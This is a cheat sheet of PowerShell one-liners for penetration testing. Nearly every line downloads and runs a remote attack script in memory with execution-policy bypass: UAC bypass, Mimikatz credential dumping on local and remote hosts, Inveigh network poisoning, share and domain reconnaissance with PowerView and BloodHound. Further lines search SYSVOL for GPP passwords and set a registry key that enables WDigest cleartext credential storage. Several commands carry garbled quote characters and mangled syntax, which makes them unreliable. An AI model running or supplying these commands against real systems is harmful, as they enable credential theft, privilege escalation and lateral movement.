One-liners Collection of PowerShell one-liners to use at various stages of testing.
Powershell
Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
Copy powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
Invoke-Mimikatz: Dump credentials from memory
Copy powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
Import Mimikatz Module to run further commands
Copy powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
Invoke-MassMimikatz: Use to dump creds on remote host
replace $env:computername with target server name(s)**
Copy powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
PowerUp: Privilege escalation checks
Copy powershell.exe -exec Bypass -C โIEX (New-Object Net.WebClient).DownloadString(โhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1โ);Invoke-AllChecksโ
Invoke-Inveigh and log output to file
Copy powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y โNBNS Y โmDNS Y โProxy Y -LogOutput Y -FileOutput Y"
Invoke-ShareFinder and print output to file
Copy powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
Import PowerView Module to run further commands
Copy powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
Invoke-Bloodhound
Copy powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
Find GPP Passwords in SYSVOL
Copy findstr / S cpassword $ env: logonserver\sysvol\ * .xml findstr / S cpassword % logonserver % \sysvol\ * .xml ( cmd.exe )
Run Powershell prompt as a different user, without loading profile to the machine
replace DOMAIN and USER**
Copy runas / user:DOMAIN\USER / noprofile powershell.exe
Insert reg key to enable Wdigest on newer versions of Windows
Copy reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest / v UseLogonCredential / t Reg_DWORD / d 1
Last updated 9 months ago